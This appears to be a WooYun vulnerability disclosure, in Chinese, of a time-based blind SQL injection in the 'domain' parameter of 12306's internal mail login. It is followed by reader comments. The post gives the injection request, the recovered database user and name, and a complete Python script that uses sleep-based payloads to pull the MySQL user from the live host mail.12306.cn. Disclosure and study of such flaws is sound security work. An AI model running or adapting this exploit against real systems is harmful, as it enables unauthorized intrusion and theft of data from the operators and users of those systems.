缺陷编号:WooYun-2014-089304
漏洞标题:12306某内部系统MySQL盲注需进一步修复(附验证脚本第四次绕过)
相关厂商:12306
漏洞作者:lijiejie
提交时间:2014-12-30 13:55
公开时间:2015-02-13 13:56
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:1
漏洞状态:厂商已经确认
Tags标签:
2014-12-30: 细节已通知厂商并且等待厂商处理中
2015-01-01: 厂商已经确认,细节仅向厂商公开
2015-01-11: 细节向核心白帽子及相关领域专家公开
2015-01-21: 细节向普通白帽子公开
2015-01-31: 细节向实习白帽子公开
2015-02-13: 细节向公众公开
12306某内部系统MySQL盲注需进一步修复(附验证脚本,第四次绕过)
已存在多年,一直未修复完全,影响内部运营数据
注射点:
1 |
POST http://mail.12306.cn/app/mail/logindomain=aa'XOR(if(length(database())=4,sleep(1),0))OR'bb&id=1&lang=zh_cn&pwd=1&remember=on&sid=d947be26445ad5a2c49b16f97a22be55&style=classic |
参数domain可注入,MySQL time blind. sid每次需要重新获取。
猜解user(),得到:
1 |
[email protected] |
当前库:
1 |
mail |
验证脚本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
#encoding=gbk<br> import urllib2<br> import re<br> import httplib<br> import time<br> import string<br> import sys<br> import random<br> import urllibheaders = {<br> 'Content-Type': 'application/x-www-form-urlencoded',<br> 'Cookie': '',<br> 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',<br> }<br> payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')html_doc = urllib2.urlopen('http://mail.12306.cn/app/mail/entry').read()<br> sid = re.search('name=sid value="([^"]+)"', html_doc).group(1)print 'start to retrive MySQL user:'<br> user = ''<br> for i in range(1,15):<br> count = 0<br> for payload in payloads:<br> try:<br> conn = httplib.HTTPConnection('mail.12306.cn', timeout=60)<br> s = "123'XOR(if(ascii(mid(lower(user())from(%s)for(1)))=%s,sleep(5),0))OR'bbb" % (i, ord(payload) )<br> params = {<br> 'id': '1',<br> 'lang': 'zh_cn',<br> 'pwd': 'test',<br> 'remember': 'on',<br> 'sid': sid,<br> 'style': 'classic',<br> 'domain': s<br> }<br> conn.request(method='POST',<br> url='/app/mail/login',<br> body = urllib.urlencode(params),<br> headers = headers)<br> start_time = time.time()<br> html_doc = conn.getresponse().read()<br> conn.close()<br> if time.time() - start_time > 5:<br> raise Exception('oooooooops')<br> count += 1<br> sys.stdout.write('\r'+ '.' * count)<br> sys.stdout.flush()<br> except:<br> user += payload<br> print '\r[In progress]', user<br> breakprint '\n[Done]MySQL user is', user |
建议还是过滤一下
危害等级:中
漏洞Rank:7
确认时间:2015-01-0110:13
正在检查
暂无
这哪里只是影响用户信息,企业内部信息可能也在劫难逃啊
前排
CCTV看这里!
@lijiejie 围观大牛!
注入狂魔李姐姐
我在等李姐姐把杀妻王子干掉
12306是要火的节奏么。
你们这是一起刷12丧零六啊
第四次。。。所以说12306在某全球最大的平台去发奖励根本不解决问题么
@px1624 这个第四次的标题应该是审核的同学加的… 不过漏洞确实存在已久
12306 这是年底要爆发的节奏吧。。
@杀器王子 杀器王子全能王… 德艺双馨玩转各种内网渗透技术…
同一个位置第四次绕过。。
第四次,你们这是看不起这个几亿的网站么?
继续打脸!12306竟然去360那边!
12306的开发不甘寂寞啊....
CCTV拍这里!
CCTV拍拍拍拍拍拍拍拍拍拍拍拍拍拍拍拍拍
吊炸天
有意思,谁还说是撞库
打脸啪啪啪
CCTV拍这里!.....papapa
啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。啪啪啪啪啪啪啪。
你好,请开下门,我们查下水表
打脸女娲么?
你好,回家的票能给我整一张不?
看不了的飘过~
我只想换一张回家的车票啊
@小威 威锅女娲是啥……话说我只想求一张回家的票。你们老撸铁道部干嘛
妈妈我要上电视啦~CCTV拍这里~~
有意思,谁还说是撞库、打脸的节奏, CCTV看这里,哎呦喂镜头往这里凑凑,对就是这样,哎哎哎哎 哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎哎摄像师你别动镜头呀
@红客十年 女娲能补天啊!真为你智商捉急
@小威 我知道女娲能补天,我想知到女娲跟铁道部有啥关系。。。还是是哪位大神
使劲的打,让你不给我火车票。
打脸赞!
可以买一条两千块的项链了
我要上电视,ccav拍这里
我代表12306在说一次 这是撞库啊 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
这里。。这里。。。
CCTV 看这里!啪啪啪啪啪啪啪
那么给力!
妈妈我要上电视啦!
原文连接
的情况下转载,若非则不得使用我方内容。